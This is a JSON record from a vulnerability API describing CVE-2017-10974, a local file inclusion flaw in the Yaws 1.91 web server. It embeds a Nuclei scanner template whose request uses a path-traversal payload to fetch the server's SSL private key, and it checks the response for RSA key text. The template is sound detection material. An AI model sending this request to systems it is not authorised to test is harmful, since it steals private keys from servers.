{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-10974/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-10974/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-10974/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-10974/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-10974/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-10974"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-10974"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-10974.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2017-10974\n\ninfo:\n  name: Yaws 1.91 - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: Yaws 1.91 allows unauthenticated local file inclusion via  /%5C../ submitted to port 8080.\n  impact: |\n    The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.\n  remediation: |\n    Upgrade to a patched version of Yaws or apply the necessary security patches.\n  reference:\n    - https://www.exploit-db.com/exploits/42303\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-10974\n    - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt\n    - https://www.exploit-db.com/exploits/42303/\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2017-10974\n    cwe-id: CWE-22\n    epss-score: 0.81159\n    epss-percentile: 0.99616\n    cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: yaws\n    product: yaws\n  tags: cve,cve2017,edb,yaws,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/%5C../ssl/yaws-key.pem\"\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - '!contains(tolower(body), \"<html\")'\n\n      - type: word\n        words:\n          - \"BEGIN RSA PRIVATE KEY\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ce1a02ccb2b78301f781ff20561391baf0966598b89c8c43126f2cf6dbaf8613022100b4e6c38a81c2021103604381ab754fe6c31ca2a2d0c2062722c175375715c64c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-10974"
}